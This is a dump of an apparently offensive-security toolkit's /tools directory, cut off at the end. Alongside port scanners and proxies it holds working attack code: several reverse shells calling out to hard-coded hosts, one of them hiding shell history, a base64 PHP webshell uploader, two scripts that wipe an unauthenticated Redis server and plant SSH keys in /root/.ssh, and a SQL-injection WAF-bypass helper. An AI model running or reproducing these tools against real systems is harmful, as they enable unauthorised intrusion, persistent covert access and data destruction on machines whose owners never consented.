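/tools/portscan.py: --------------------------------------------------------------------------------
#!/bin/env python
# -*- encoding: utf-8 -*-
"""TCP connect() scan of one or more ports on a single host.

``run([ip, "port[,port...]", [timeout]])`` returns one result line per port
("<port> : <service> : <state>"), or 'Error' when arguments are missing.

Fixes against the original: a port missing from PORT_TABLE raised KeyError,
the optional timeout was only read for a list longer than 3 elements (so it
never applied), the socket leaked when connect_ex() raised, and a bare
``except`` hid the reason. ``status`` holds WinSock codes; on POSIX
connect_ex() returns errno values, which are now labelled via errno.errorcode.
"""

import errno
from socket import socket, AF_INET, SOCK_STREAM, error as socket_error

__info__ = {
    "desc": "A script for scan port",
    "version": "1.0",
    "usage": "ip port[,more] [timeout]"
}

# connect_ex() result codes (WinSock numbering).
status = {
    0: "open",
    10049: "address not available",
    10061: "closed",
    10060: "timeout",
    10056: "already connected",
    10035: "filtered",
    11001: "IP not found",
    10013: "permission denied"
}

PORT_TABLE = {
    21: "FTP",
    22: "SSH",
    23: "Telent",
    80: "HTTP",
    443: "HTTPS",
    1521: "Oracle Server",
    3306: "MySQL Server",
    3389: "RDP"
}


def describe_result(result):
    """Label a connect_ex() code: WinSock table first, then the errno name, else the number."""
    if result in status:
        return status[result]
    return errno.errorcode.get(result, str(result))


def scan(ip, port, timeout):
    """Try one TCP connect; return "<port> : <service> : <state>", or None on a socket error."""
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(timeout)
    try:
        result = s.connect_ex((ip, port))
    except socket_error as exc:  # e.g. name resolution failure
        print("Cannot connect to IP: %s" % exc)
        return None
    finally:
        s.close()  # closed on every path; the original leaked it when connect_ex raised
    return "%d : %s : %s" % (port, PORT_TABLE.get(port, "unknown"), describe_result(result))


def run(arg):
    """Scan ``arg[1]`` (comma-separated ports) on ``arg[0]``; ``arg[2]`` is an optional timeout.

    Returns 'Error' for missing arguments, one result string for a single
    port, or a list of result strings for several.
    """
    if len(arg) < 2:
        return 'Error'
    data = {"ip": arg[0], "timeout": 5}
    if len(arg) > 2:  # was `> 3`, which a three-element [ip, ports, timeout] never satisfies
        data['timeout'] = int(arg[2])
    ports = [int(p) for p in arg[1].split(",")]
    if len(ports) == 1:
        return scan(port=ports[0], **data)
    return [scan(port=p, **data) for p in ports]


if __name__ == '__main__':
    # Sweep port 80 across a /24; edit the prefix for another network.
    for i in range(256):
        host = "192.168.5.%d" % i
        print(host)
        print(run([host, "80"]))
-------------------------------------------------------------------------------- /tools/portscan2.py: --------------------------------------------------------------------------------
#!/bin/env python
# -*- encoding: utf-8 -*-
"""Threaded TCP connect scanner with a banner probe (Violent Python style).

usage: portscan2.py -H <host> -p <port[,port...]>

Fixes against the original: the socket was created inside the ``try`` so
``connSkt.close()`` in ``finally`` raised NameError when socket() itself
failed, ``release()`` ran even when the lock had not been acquired, the
argument check compared a string against ``None``, and the worker threads
were never joined.
"""

import optparse
import socket
import threading

screenLock = threading.Semaphore(value=1)


def connScan(tgtHost, tgtPort):
    """Connect to tgtHost:tgtPort, send a probe line and print open/closed plus any banner."""
    connSkt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        connSkt.connect((tgtHost, tgtPort))
        connSkt.send('ViolentPython\r\n')
        results = connSkt.recv(100)
        with screenLock:
            print('[+]%d/tcp open' % tgtPort)
            print('[+] ' + str(results))
    except socket.error:
        with screenLock:
            print('[-] %d/tcp closed' % tgtPort)
    finally:
        connSkt.close()


def portScan(tgtHost, tgtPorts):
    """Resolve tgtHost, then scan every port in tgtPorts on its own thread and wait for all."""
    try:
        tgtIP = socket.gethostbyname(tgtHost)
    except socket.error:
        print("[-] Cannot resolve '%s': Unknown host" % tgtHost)
        return
    try:
        tgtName = socket.gethostbyaddr(tgtIP)
        print('\n[+] Scan Results for:' + tgtName[0])
    except socket.error:
        print('\n[+] Scan Results for:' + tgtIP)
    socket.setdefaulttimeout(1)
    workers = []
    for tgtPort in tgtPorts:
        t = threading.Thread(target=connScan, args=(tgtHost, int(tgtPort)))  # one thread per port
        t.start()
        workers.append(t)
    for t in workers:
        t.join()


def main():
    parser = optparse.OptionParser("usage%prog " + "-H <host> -p <port[,port...]>")
    parser.add_option('-H', dest='tgtHost', type='string',
                      help='specify target host')
    parser.add_option('-p', dest='tgtPort', type='string',
                      help='specify target port[s] separated by comma')
    (options, args) = parser.parse_args()
    if options.tgtHost is None or options.tgtPort is None:
        print(parser.usage)
        exit(0)
    portScan(options.tgtHost, options.tgtPort.split(','))


if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /tools/portscan3.py: -------------------------------------------------------------------------------- 1 | #!/user/bin python 2 | # -*- coding:utf-8 -*- 3 | # Author:Bing 4 | # Contact:amazing_bing@outlook.com 5 | # DateTime: 2017-01-17 19:06:06 6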
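# Description: coding
"""Full-range TCP connect scan (ports 1-65535) with 200 worker threads.

``Work(scan_target=host, back_fn=callback).run()`` probes every port, labels
the open ones with the service name taken from ``dict_script_path +
"nmap-services.txt"`` (one ``service;port/proto`` entry per line; the path
comes from core.settings) and calls ``back_fn`` with
``{"status": 1, "data": [...], "scan_id": ..., "scan_type": "nmap"}``.

Fixes against the original: ``range(1, 65535)`` skipped port 65535; the
services file was re-read from disk for every open port; the worker loop
could block forever on ``get()`` after ``empty()`` raced with another
worker; and the threads were joined with a 0.1 s timeout, so the callback
fired while most ports were still queued and the result was partial.
"""

import sys
sys.path.append("..")

import threading
import socket
import sys
import cmd
import os
import Queue
from core.settings import *

# 线程锁 -> serialises publication of results
lock = threading.Lock()

# 制作扫描端口队列


def GetQueue(host):
    """Return a Queue of (host, port) for every TCP port 1..65535 inclusive."""
    PortQueue = Queue.Queue()
    for port in range(1, 65536):
        PortQueue.put((host, port))
    return PortQueue


_service_cache = {}


def _load_services():
    """Parse nmap-services.txt ("service;port/proto" per line) once into {port/proto: service}."""
    if not _service_cache:
        service_path = dict_script_path + "nmap-services.txt"
        with open(service_path, "r") as server:
            for finger in server:
                parts = finger.strip().split(";")
                # first entry for a port wins, matching the original linear search
                if len(parts) >= 2 and parts[1] not in _service_cache:
                    _service_cache[parts[1]] = parts[0]
    return _service_cache


class ScanThread(threading.Thread):
    """Worker: drains the shared (host, port) queue and publishes open ports to ``outip``."""

    def __init__(self, SingleQueue, outip):
        threading.Thread.__init__(self)
        self.setDaemon(True)  # 设置后台运行 -> never keeps the process alive on its own
        self.SingleQueue = SingleQueue
        self.outip = outip

    def get_port_service(self, text):
        """Return ("<port>/tcp", service name or "unknown") for port ``text``."""
        port_server = str(text) + "/tcp"
        return (port_server, _load_services().get(port_server, "unknown"))

    def Ping(self, scanIP, Port):
        """TCP connect with a 0.1 s timeout; publish the service tuple on success. Returns True/False."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(0.1)
        address = (scanIP, Port)
        try:
            sock.connect(address)
        except socket.error:
            return False
        finally:
            sock.close()
        with lock:
            # print "IP:%s Port:%d" % (scanIP, Port)
            self.outip.put(self.get_port_service(Port))
        return True

    def run(self):
        while True:
            # 获取扫描队列,并扫描 -> take the next pair; stop when the queue is drained
            try:
                host, port = self.SingleQueue.get_nowait()
            except Queue.Empty:
                return
            self.Ping(host, port)


class Work(object):
    """One scan job: target host, optional metadata, and the callback that receives the result."""

    def __init__(self, scan_id="", scan_target="", scan_type="", scan_args="", back_fn=None):
        self.scan_id = scan_id
        self.target = scan_target
        self.scan_type = scan_type
        self.args = scan_args
        self.back_fn = back_fn
        self.result = []

    def run(self):
        """Run 200 ScanThreads over the full port range, then hand the result dict to ``back_fn``."""
        ThreadList = []
        # 扫描队列 -> (host, port) pairs still to probe
        SingleQueue = GetQueue(self.target)
        # 存储结果队列 -> (port/tcp, service) tuples found open
        resultQueue = Queue.Queue()
        # 启动200线程并发
        for i in range(0, 200):
            t = ScanThread(SingleQueue, resultQueue)
            ThreadList.append(t)
        for t in ThreadList:
            t.start()
        for t in ThreadList:
            t.join()  # was join(0.1): returned before the scan had finished

        data = []
        while not resultQueue.empty():
            line = resultQueue.get()
            data.append(
                {"bug_name": str(line[0]), "bug_summary": str(line[1])})
        result = {"status": 1, "data": data,
                  "scan_id": self.scan_id, "scan_type": "nmap"}
        self.back_fn(result)


def save(nmap_result):
    """Default callback: print the result dict."""
    print("%s ----------------" % (nmap_result,))

if __name__ == '__main__':
    t = Work(scan_target="100tal.org", back_fn=save)
    t.run()
-------------------------------------------------------------------------------- /tools/portscan4.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# encoding=utf-8
# Filename: test.py
# author = 0c0c0f
"""Threaded connect() scan of a fixed list of common ports on one target.

usage: portscan4.py [-t THREADS] target

Fixes against the original: ``args[0]`` was matched before the length check
(IndexError with no argument) and the check itself was inverted
(``len(args) < 1 and m`` is never true); the probe socket was only closed on
the success path; and every exception from ``queue.get`` was treated as
"queue empty".
"""
import threading,sys,socket,re
import time,Queue
import optparse

#定义扫描端口 -> ports probed on the target
PortList = [21,22,23,25,53,80,443,445,873,1433,1521,1723,3306,3389,4848,4899,5800,5900,7001,8080,8443,8500,9080,9200,27017]
#存放IP数组 -> unused, kept for compatibility
result =[]
#定义连接超时时间 -> per-connection timeout (seconds)
Timeout = 2
# 创建锁 -> serialises printing from the workers
mutex = threading.Lock()
#定义线程池
threads = []
#创建队列
queue = Queue.Queue()

def scan():
    """Worker: pop (ip, port) items until the queue is empty and print each open port."""
    global mutex,queue,Timeout
    while True:
        try:
            item = queue.get(timeout=0.1)
        except Queue.Empty:
            break
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(Timeout)
        try:
            sk.connect((item['ip'],int(item['port'])))
            is_open = True
        except socket.error:
            is_open = False  # closed/filtered ports stay silent, as before
        finally:
            sk.close()
        if is_open:
            with mutex:
                print('Server %s port %d OK!' % (item['ip'],item['port']))

def main(txt,num):
    """Queue PortList for ``txt`` and run ``num`` worker threads to completion."""
    for j in PortList:
        queue.put({'ip': txt,'port':int(j)})
    for x in xrange(0, num):
        th = threading.Thread(target=scan)
        th.start()
        threads.append(th)
    for t in threads:
        t.join()

if __name__ == '__main__':
    parser = optparse.OptionParser('usage: %prog [options] target')
    parser.add_option('-t','--threads', dest='threads_num',default=20, type='int',help='Number of threads. default = 20')
    (options, args) = parser.parse_args()
    # Check the argument count before touching args[0].
    if len(args) < 1:
        parser.print_help()
        sys.exit(0)
    txt = str(args[0])
    if not re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', txt):
        # socket.connect() resolves host names, so a non-dotted-quad target is only a warning
        print('[*] %s is not an IPv4 address, will be resolved as a host name' % txt)
    time1= time.time()
    main(txt,int(options.threads_num))
    time2= time.time()
    print(time2-time1)
-------------------------------------------------------------------------------- /tools/post_upload.py: --------------------------------------------------------------------------------
#!/bin/env python
#-*- encoding: utf-8 -*-
"""POST one file to an upload endpoint and print the response body.

usage: post_upload.py <upload_url> [file_name]

The default payload is a PHP one-liner (``eval($_POST[999])``) wrapped in
junk bytes and base64-encoded, meant for upload handlers that base64-decode
before writing. It is a webshell: use only against targets you are
authorised to test.

Fixes against the original: ``upload()`` takes two arguments but was called
with one (TypeError), and the target URL was an empty string.
"""

import requests
import re
import string
import random
import sys

reload(sys)
sys.setdefaultencoding("utf-8")

req = requests.session()
url = ''


def upload(file_name, file_data):
    """Multipart-POST ``file_data`` as ``file_name`` to the module-level ``url``.

    Returns the response body on HTTP 200, otherwise False.
    """
    files = {
        "file": (file_name, file_data, 'application/octet-stream'),
    }
    res = req.post(url=url, files=files)
    if res.status_code == 200:
        return res.content
    else:
        return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('usage: %s <upload_url> [file_name]' % sys.argv[0])
        sys.exit(1)
    url = sys.argv[1]
    file_name = sys.argv[2] if len(sys.argv) > 2 else 'shell.php'
    shell1 = 'paaaPD9waHAgZXZhbCgkX1BPU1RbOTk5XSk7Pz5w'
    res = upload(file_name, shell1)
    if res:
        print(res)
-------------------------------------------------------------------------------- /tools/random_string.py: --------------------------------------------------------------------------------
#!/bin/env python
#-*- encoding: utf-8 -*-
"""Generate a random string of distinct lowercase letters."""

import string
import random
import sys

reload(sys)
sys.setdefaultencoding("utf-8")

# SystemRandom reads os.urandom; the default Mersenne Twister is predictable
# from its output and must not back anything security-sensitive.
_rng = random.SystemRandom()


def randstr(num=10):
    """Return ``num`` distinct lowercase letters in random order.

    ``sample`` draws without replacement, so ``num`` must be <= 26
    (ValueError otherwise) and no letter repeats -- which also makes the
    result lower-entropy than a uniform string of the same length.
    """
    return ''.join(_rng.sample(string.ascii_lowercase, num))

if __name__ == '__main__':
    print(randstr())
-------------------------------------------------------------------------------- /tools/redis.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Find Redis servers that answer INFO without authentication.

Reads hosts from ``redis.txt`` (one per line), sends a RESP ``INFO`` command
to port 6379 and, when the reply carries ``redis_version`` (no AUTH was
required), appends the host line to ``vul.txt``.

Fix against the original: one socket object was reused for every target, so
after the first connect() every later attempt failed inside ``except: pass``
and only the first host was ever tested. A fresh socket is now opened and
closed per host.
"""

import sys,httplib
import socket,sys

TARGET_FILE = 'redis.txt'
OUTPUT_FILE = 'vul.txt'
REDIS_PORT = 6379
# RESP encoding of "INFO": *1\r\n$4\r\ninfo\r\n
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'


def check_redis(ip, port=REDIS_PORT, timeout=10):
    """Return True if ip:port answers an unauthenticated INFO with a redis_version line."""
    s = socket.socket()
    s.settimeout(timeout)
    try:
        s.connect((ip, port))
        s.send(payload)
        recvdata = s.recv(1024)
    except socket.error:
        return False
    finally:
        s.close()
    return bool(recvdata) and 'redis_version' in recvdata


if __name__ == '__main__':
    with open(TARGET_FILE, 'r') as fobj, open(OUTPUT_FILE, 'a+') as fileHandle:
        for target in fobj:
            ip = target.strip()
            if ip and check_redis(ip):
                fileHandle.write(target)
                print('server is vulerable')
-------------------------------------------------------------------------------- /tools/redis_ssh.sh: --------------------------------------------------------------------------------
#!/bin/sh
# Plant an SSH public key on an unauthenticated Redis host: CONFIG SET
# dir/dbfilename + SAVE makes the RDB dump land in /root/.ssh/authorized_keys.
#
# usage: redis_ssh.sh <host>
# pub.txt should hold the key surrounded by blank lines ("\n\nssh-rsa ...\n\n")
# so sshd can still pick it out of the RDB binary framing.
#
# WARNING: FLUSHALL deletes every key on the target and SAVE overwrites the
# dump file. Only run against hosts you are authorised to test.
set -eu
if [ $# -lt 1 ]; then
    echo "usage: $0 <host>" >&2
    exit 1
fi
redis-cli -h "$1" flushall
redis-cli -h "$1" -x set 1 < pub.txt
redis-cli -h "$1" config set dir /root/.ssh
redis-cli -h "$1" config set dbfilename authorized_keys
redis-cli -h "$1" save
--------------------------------------------------------------------------------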
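/tools/reverse-shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use Socket; 4 | $i = "192.168.31.157"; 5 | $p = 7788; 6 | socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); 7 | if(connect(S,sockaddr_in($p,inet_aton($i)))){ 8 | open(STDIN,">&S"); 9 | open(STDOUT,">&S"); 10 | open(STDERR,">&S"); 11 | exec("/bin/sh -i"); 12 | }; -------------------------------------------------------------------------------- /tools/rexp.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
"""Plant an SSH key through an unauthenticated Redis server.

usage: python rexp.py host[:port]   (port defaults to 6379)

Sequence: FLUSHALL, store foo.txt under key ``pwn`` via redis-cli, point the
dump file at /root/.ssh/authorized_keys with CONFIG SET dir/dbfilename, then
SAVE. Destructive (FLUSHALL wipes the keyspace) -- authorised tests only.

Fixes against the original: the result of ``host.split(":")`` was discarded
so the port was never parsed and ``"%d" % host`` was a format error; ``conn``
was used even when the connect failed; ``send()`` read only 5 bytes and
returned a tuple because of a stray trailing comma; and the key was written
with ``os.system("... -h %s -p %d ...")``, interpolating argv into a shell
command line (command injection through the host argument). subprocess is
now called with an argv list, so no shell is involved.
"""
import socket
import subprocess
from sys import argv


def send(conn, cmd):
    """Send one inline command; return the reply without newlines, or False on a socket error."""
    try:
        conn.send(cmd + "\n")
        recv = conn.recv(1024)
        return recv.replace("\n", '')
    except socket.error:
        return False


def conn_redis(args):
    """Connect to "host:port"; return the socket, or False if the connect fails."""
    host, port = args.split(":")
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.settimeout(10)
    try:
        client.connect((host, int(port)))
        return client
    except socket.error:
        client.close()
        return False


if __name__ == '__main__':
    if len(argv) != 2:
        print("Usage: python rexp.py 127.0.0.1:6379")
        exit()
    parts = argv[1].split(":")
    host = parts[0]
    port = int(parts[1]) if len(parts) > 1 else 6379
    conn = conn_redis("%s:%d" % (host, port))
    if not conn:
        print("cannot connect to %s:%d" % (host, port))
        exit(1)
    send(conn, "flushall")
    # redis-cli -x reads the value from stdin; argv list => no shell, no injection.
    with open("foo.txt", "rb") as payload:
        subprocess.call(["redis-cli", "-h", host, "-p", str(port), "-x", "set", "pwn"],
                        stdin=payload)
    for c in ("CONFIG set dir /root/.ssh/",
              "config set dbfilename authorized_keys",
              "save",
              "quit"):  # the original sent "exit", which is not a Redis command
        send(conn, c)
    conn.close()
-------------------------------------------------------------------------------- /tools/rtcp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | ''' 5 | filename:rtcp.py 6 | @desc: 7 | 利用python的socket端口转发,用于远程维护 8 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 9 | 10 | @usage: 11 | ./rtcp.py stream1 stream2 12 | 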
stream为:l:port或c:host:port 13 | l:port表示监听指定的本地端口 14 | c:host:port表示监听远程指定的端口 15 | 16 | @author: watercloud, zd, knownsec team 17 | @web: www.knownsec.com, blog.knownsec.com 18 | @date: 2009-7 19 | ''' 20 | 21 | import socket 22 | import sys 23 | import threading 24 | import time 25 | 26 | streams = [None, None] # 存放需要进行数据转发的两个数据流(都是SocketObj对象) 27 | debug = 1 # 调试状态 0 or 1 28 | 29 | def _usage(): 30 | print 'Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port' 31 | 32 | def _get_another_stream(num): 33 | ''' 34 | 从streams获取另外一个流对象,如果当前为空,则等待 35 | ''' 36 | if num == 0: 37 | num = 1 38 | elif num == 1: 39 | num = 0 40 | else: 41 | raise "ERROR" 42 | 43 | while True: 44 | if streams[num] == 'quit': 45 | print("can't connect to the target, quit now!") 46 | sys.exit(1) 47 | 48 | if streams[num] != None: 49 | return streams[num] 50 | else: 51 | time.sleep(1) 52 | 53 | def _xstream(num, s1, s2): 54 | ''' 55 | 交换两个流的数据 56 | num为当前流编号,主要用于调试目的,区分两个回路状态用。 57 | ''' 58 | try: 59 | while True: 60 | #注意,recv函数会阻塞,直到对端完全关闭(close后还需要一定时间才能关闭,最快关闭方法是shutdow) 61 | buff = s1.recv(1024) 62 | if debug > 0: 63 | print num,"recv" 64 | if len(buff) == 0: #对端关闭连接,读不到数据 65 | print num,"one closed" 66 | break 67 | s2.sendall(buff) 68 | if debug > 0: 69 | print num,"sendall" 70 | except : 71 | print num,"one connect closed." 
72 | 73 | try: 74 | s1.shutdown(socket.SHUT_RDWR) 75 | s1.close() 76 | except: 77 | pass 78 | 79 | try: 80 | s2.shutdown(socket.SHUT_RDWR) 81 | s2.close() 82 | except: 83 | pass 84 | 85 | streams[0] = None 86 | streams[1] = None 87 | print num, "CLOSED" 88 | 89 | def _server(port, num): 90 | ''' 91 | 处理服务情况,num为流编号(第0号还是第1号) 92 | ''' 93 | srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 94 | srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 95 | srv.bind(('0.0.0.0', port)) 96 | srv.listen(1) 97 | while True: 98 | conn, addr = srv.accept() 99 | print "connected from:", addr 100 | streams[num] = conn # 放入本端流对象 101 | s2 = _get_another_stream(num) # 获取另一端流对象 102 | _xstream(num, conn, s2) 103 | 104 | def _connect(host, port, num): 105 | ''' 处理连接,num为流编号(第0号还是第1号) 106 | 107 | @note: 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 108 | ''' 109 | not_connet_time = 0 110 | wait_time = 36 111 | try_cnt = 199 112 | while True: 113 | if not_connet_time > try_cnt: 114 | streams[num] = 'quit' 115 | print('not connected') 116 | return None 117 | 118 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 119 | try: 120 | conn.connect((host, port)) 121 | except Exception, e: 122 | print ('can not connect %s:%s!' 
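% (host, port)) 123 | not_connet_time += 1 124 | time.sleep(wait_time) 125 | continue 126 | 127 | print "connected to %s:%i" % (host, port) 128 | streams[num] = conn #放入本端流对象 129 | s2 = _get_another_stream(num) #获取另一端流对象 130 | _xstream(num, conn, s2) 131 | 132 | 133 | if __name__ == '__main__': 134 | if len(sys.argv) != 3: 135 | _usage() 136 | sys.exit(1) 137 | tlist = [] # 线程列表,最终存放两个线程对象 138 | targv = [sys.argv[1], sys.argv[2] ] 139 | for i in [0, 1]: 140 | s = targv[i] # stream描述 c:ip:port 或 l:port 141 | sl = s.split(':') 142 | if len(sl) == 2 and (sl[0] == 'l' or sl[0] == 'L'): # l:port 143 | t = threading.Thread(target=_server, args=(int(sl[1]), i)) 144 | tlist.append(t) 145 | elif len(sl) == 3 and (sl[0] == 'c' or sl[0] == 'C'): # c:host:port 146 | t = threading.Thread(target=_connect, args=(sl[1], int(sl[2]), i)) 147 | tlist.append(t) 148 | else: 149 | _usage() 150 | sys.exit(1) 151 | 152 | for t in tlist: 153 | t.start() 154 | for t in tlist: 155 | t.join() 156 | sys.exit(0) 157 | -------------------------------------------------------------------------------- /tools/runmd5.py: --------------------------------------------------------------------------------
#!/bin/env python
# -*- encoding: utf-8 -*-
"""Brute-force the integer whose MD5 hex digest starts with a given prefix.

Typical CTF use: recover an 8-digit number from the first few hex characters
of its MD5. ``run([prefix, start, end])`` returns the first match in
[start, end] (defaults 10000000..100000000), None if none, False for an
empty prefix.

Fixes against the original: ``start``/``end`` were read from the wrong argv
indexes (``start`` was assigned twice and ``end`` never), they were used as
strings, and the removed ``md5`` module is replaced by hashlib.
"""

import hashlib


def md5x(data):
    """Hex MD5 of ``data`` (a str; encoded as UTF-8 when it is not already bytes)."""
    if not isinstance(data, bytes):
        data = data.encode('utf-8')
    return hashlib.md5(data).hexdigest()


def run(arg):
    """Search for an integer whose md5 starts with ``arg[0]``; ``arg[1]``/``arg[2]`` bound the range."""
    code = arg[0] if arg else ''
    if not code:
        return False
    start = int(arg[1]) if len(arg) > 1 else 10000000
    end = int(arg[2]) if len(arg) > 2 else 100000000
    prefix_len = len(code)
    print('Runing...')
    while start <= end:
        if md5x(str(start))[:prefix_len] == code:
            print(start)
            return start
        start += 1
    return None

if __name__ == '__main__':
    run(['1ceac'])
-------------------------------------------------------------------------------- /tools/shell_53_udp.py: --------------------------------------------------------------------------------
# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
UDP by anthrax@insight-labs.org

usage: shell_53_udp.py <host> <port> [udp]

Reverse shell: connects back to host:port (TCP, or UDP when the third
argument is "udp"), dup2()s the socket onto stdin/stdout/stderr and spawns
/bin/sh on a pty. The HIST* variables are cleared first so the session does
not leave a shell history file. Post-exploitation tool -- authorised
engagements only.

Fix against the original: the optional third argument was read inside a
bare try/except instead of being checked by length.
"""
import sys
import os
import socket
import pty

shell = "/bin/sh"


def usage(name):
    print('python reverse connector')
    print('usage: %s <host> <port> [udp]' % name)


def main():
    if len(sys.argv) < 3:
        usage(sys.argv[0])
        sys.exit()
    use_udp = len(sys.argv) > 3 and sys.argv[3] == 'udp'
    sock_type = socket.SOCK_DGRAM if use_udp else socket.SOCK_STREAM
    s = socket.socket(socket.AF_INET, sock_type)
    try:
        s.connect((sys.argv[1], int(sys.argv[2])))
        print('connect ok')
    except (socket.error, ValueError):
        print('connect faild')
        sys.exit()
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    # Drop every history variable, then pin the ones shells re-create.
    for var in ("HISTFILE", "HISTFILESIZE", "HISTSIZE", "HISTORY",
                "HISTSAVE", "HISTZONE", "HISTLOG", "HISTCMD"):
        os.unsetenv(var)
    os.putenv("HISTFILE", '/dev/null')
    os.putenv("HISTSIZE", '0')
    os.putenv("HISTFILESIZE", '0')
    pty.spawn(shell)
    s.close()

if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /tools/socket_shell.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import subprocess 3 | import os 4 | IP = "127.0.0.1" 5 | PORT = 9999 6 | s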
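= socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | s.connect((IP, PORT)) 8 | os.dup2(s.fileno(), 0) 9 | os.dup2(s.fileno(), 1) 10 | os.dup2(s.fileno(), 2) 11 | p = subprocess.call(["/bin/bash", "-i"]) 12 | -------------------------------------------------------------------------------- /tools/socket_shell_bash_py.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.78.13.23",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -------------------------------------------------------------------------------- /tools/socks5.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# Python Dynamic Socks5 Proxy
# Usage: python socks5.py 1080 [bind_address]
# Background Run: nohup python s5.py 1080 &
"""Minimal threaded SOCKS5 proxy (RFC 1928): no authentication, CONNECT only,
IPv4 and domain-name targets.

There is NO client authentication, so anyone who can reach the listening
port can relay traffic through this host. Bind it to 127.0.0.1 (second
argument) or firewall the port unless exposing it is intended.

Fixes against the original: the greeting was read with a raw recv() while
the request was read through the buffered rfile (bytes could be swallowed by
the buffer), an IPv6 or unknown address type left ``addr`` unbound, a
non-CONNECT command dereferenced an unbound ``remote`` (NameError, not
caught by ``except socket.error``), relaying used send() and could drop the
tail of a partial write, and the remote socket was never closed.
"""

import socket
import sys
import select
import SocketServer
import struct
import time


class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    allow_reuse_address = True  # restart without waiting out TIME_WAIT
    daemon_threads = True       # Ctrl-C does not hang on open relays


class Socks5Server(SocketServer.StreamRequestHandler):

    def handle_tcp(self, sock, remote):
        """Relay bytes between ``sock`` and ``remote`` until either side closes."""
        fdset = [sock, remote]
        while True:
            r, w, e = select.select(fdset, [], [])
            if sock in r:
                data = sock.recv(4096)
                if not data:
                    break
                remote.sendall(data)  # sendall: send() may write only part of the buffer
            if remote in r:
                data = remote.recv(4096)
                if not data:
                    break
                sock.sendall(data)

    def handle(self):
        """Negotiate one SOCKS5 session and relay it."""
        sock = self.connection
        remote = None
        try:
            # 1. Greeting: VER NMETHODS METHODS[n]; answer "no authentication" (0x00).
            #    Everything is read through rfile so nothing is lost in its buffer.
            ver, nmethods = struct.unpack('BB', self.rfile.read(2))
            self.rfile.read(nmethods)
            sock.sendall("\x05\x00")
            # 2. Request: VER CMD RSV ATYP DST.ADDR DST.PORT
            data = self.rfile.read(4)
            mode = ord(data[1])
            addrtype = ord(data[3])
            if addrtype == 1:  # IPv4
                addr = socket.inet_ntoa(self.rfile.read(4))
            elif addrtype == 3:  # Domain name: one length byte, then the name
                addr = self.rfile.read(ord(self.rfile.read(1)))
            else:  # IPv6 (4) or garbage: "address type not supported"
                sock.sendall("\x05\x08\x00\x01" + "\x00" * 6)
                return
            port = struct.unpack('>H', self.rfile.read(2))[0]
            if mode == 1:  # 1. Tcp connect
                remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                try:
                    remote.connect((addr, port))
                    local = remote.getsockname()
                    reply = "\x05\x00\x00\x01" + socket.inet_aton(local[0]) + \
                        struct.pack(">H", local[1])
                except socket.error:
                    # Connection refused / unreachable
                    reply = "\x05\x05\x00\x01" + "\x00" * 6
            else:
                reply = "\x05\x07\x00\x01" + "\x00" * 6  # Command not supported
            sock.sendall(reply)
            # 3. Transfering
            if reply[1] == '\x00':  # Success
                self.handle_tcp(sock, remote)
        except (socket.error, struct.error, IndexError):
            pass  # malformed or aborted handshake: drop the client
        finally:
            if remote is not None:
                remote.close()


def main():
    filename = sys.argv[0]
    if len(sys.argv) < 2:
        print('usage: ' + filename + ' port [bind_address]')
        sys.exit()
    socks_port = int(sys.argv[1])
    # '' keeps the original all-interfaces behaviour; pass 127.0.0.1 to keep
    # this unauthenticated proxy off the network.
    bind_addr = sys.argv[2] if len(sys.argv) > 2 else ''
    server = ThreadingTCPServer((bind_addr, socks_port), Socks5Server)
    print('bind %s:%d ok!' % (bind_addr or '0.0.0.0', socks_port))
    if not bind_addr:
        print('WARNING: no authentication and listening on all interfaces')
    server.serve_forever()
if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /tools/sqlin.py: --------------------------------------------------------------------------------
#!/bin/env python
#-*- encoding: utf-8 -*-
"""CTF helper: UNION-based SQL injection with NUL bytes inside the keywords
(``sel\\x00ect``) to slip past a keyword-matching WAF.

Target URL and payload are hard-coded for the challenge this was written
for; edit ``url``/``sql`` in ``__main__``.
"""

import requests
import re
import string
import random
import sys

reload(sys)
sys.setdefaultencoding("utf-8")

req = requests.session()


def post(url, data, headers):
    """POST ``data`` to ``url``; return the body on HTTP 200, else False."""
    res = req.post(url=url, data=data, headers=headers)
    return res.content if res.status_code == 200 else False


def get(url, headers):
    """GET ``url``; return the body on HTTP 200, else False."""
    res = req.get(url=url, headers=headers)
    return res.content if res.status_code == 200 else False


# get_1/get_2 were byte-for-byte copies of get(); kept as aliases for callers.
get_1 = get
get_2 = get

if __name__ == '__main__':
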